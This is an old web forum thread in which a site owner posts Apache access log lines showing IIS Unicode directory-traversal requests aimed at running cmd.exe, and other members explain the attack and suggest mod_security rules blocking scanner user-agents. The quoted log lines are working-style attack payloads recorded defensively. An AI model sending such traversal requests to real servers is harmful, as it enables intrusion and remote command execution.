logo
Apache Lounge
Webmasters

 

About Forum Index Downloads Search Register Log in RSS X


Keep Server Online

If you find the Apache Lounge, the downloads and overall help useful, please express your satisfaction with a donation.

or

Bitcoin

A donation makes a contribution towards the costs, the time and effort that's going in this site and building.

Thank You! Steffen

Your donations will help to keep this site alive and well, and continuing building binaries. Apache Lounge is not sponsored.
Post new topic   Forum Index -> Apache View previous topic :: View next topic
Reply to topic   Topic: Server Log entries ?
Author
rube2112



Joined: 15 Aug 2006
Posts: 3

PostPosted: Tue 15 Aug '06 7:36    Post subject: Server Log entries ? Reply with quote

Can someone tell me exactly what this guy was trying to do? He didn't succeed but it worries me...thanks......Robb

218.92.92.248 - - [13/Aug/2006:21:01:54 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 1118
218.92.92.248 - - [13/Aug/2006:21:01:54 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 1118 "-" "-"
218.92.92.248 - - [13/Aug/2006:21:01:54 -0400] "GET /scripts/root.exe?/c+dir" 404 1118
218.92.92.248 - - [13/Aug/2006:21:01:54 -0400] "GET /scripts/root.exe?/c+dir" 404 1118 "-" "-"
218.92.92.248 - - [13/Aug/2006:21:01:55 -0400] "GET /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 1118
218.92.92.248 - - [13/Aug/2006:21:01:55 -0400] "GET /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 1118 "-" "-"
218.92.92.248 - - [13/Aug/2006:21:01:56 -0400] "GET /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 1118
218.92.92.248 - - [13/Aug/2006:21:01:56 -0400] "GET /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 1118 "-" "-"
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 7371
Location: Germany, Next to Hamburg

PostPosted: Tue 15 Aug '06 9:33    Post subject: Reply with quote

That was an attack for an IIS server. Don't worry. Apache is secure against this.
Back to top
rube2112



Joined: 15 Aug 2006
Posts: 3

PostPosted: Tue 15 Aug '06 21:26    Post subject: Reply with quote

Thanks......people never cease to amaze me. I have no idea what could possibly be enticing about our webserver. Thanks for the reply......Robb
Back to top
ali_fareed



Joined: 04 Jul 2006
Posts: 61
Location: Bahrain

PostPosted: Tue 15 Aug '06 22:17    Post subject: Reply with quote

The guy was trying a very old iis 5.0 unicode file traversal attack this attack has been fixed years ago but I can see other attacks maybe he is using a cgi vulnerablility scanner maybe nikto it's a nice idea to use such a scanner on yourself to find if you have vulnerabilities so that youcan fix them try using mod_security also it's very effective against such scanners many scanners have their name in their user-agents by default try using mod_security to block user-agents with strings like whisker , nikto and brutus this isn't foolproof but it should stop most script kiddies from scanning your site.
Back to top
rube2112



Joined: 15 Aug 2006
Posts: 3

PostPosted: Tue 15 Aug '06 23:18    Post subject: Reply with quote

My server and website is brand new. It hasn't been submitted to any search engines yet....the only thing I've done here lately is ban alot of bots from accessing. I'm wondering if I made the guy made by doing that or something. I don't even have iis installed.....Robb
Back to top
ali_fareed



Joined: 04 Jul 2006
Posts: 61
Location: Bahrain

PostPosted: Wed 16 Aug '06 2:18    Post subject: Reply with quote

well you dont have to submit your site to get people like that he may have scanned a range of addresses using a port scanner like nmap looking for webservers and he may have found you if you have a firewall that logs all tcp connections check it out it will show you a lot of info about the connection and he probably doesnt have a reason to try to attack your site he probably is bored and he wants to deface a site or maybe he is building a bot army for a ddos attack or something.
Back to top


Reply to topic   Topic: Server Log entries ? View previous topic :: View next topic
Post new topic   Forum Index -> Apache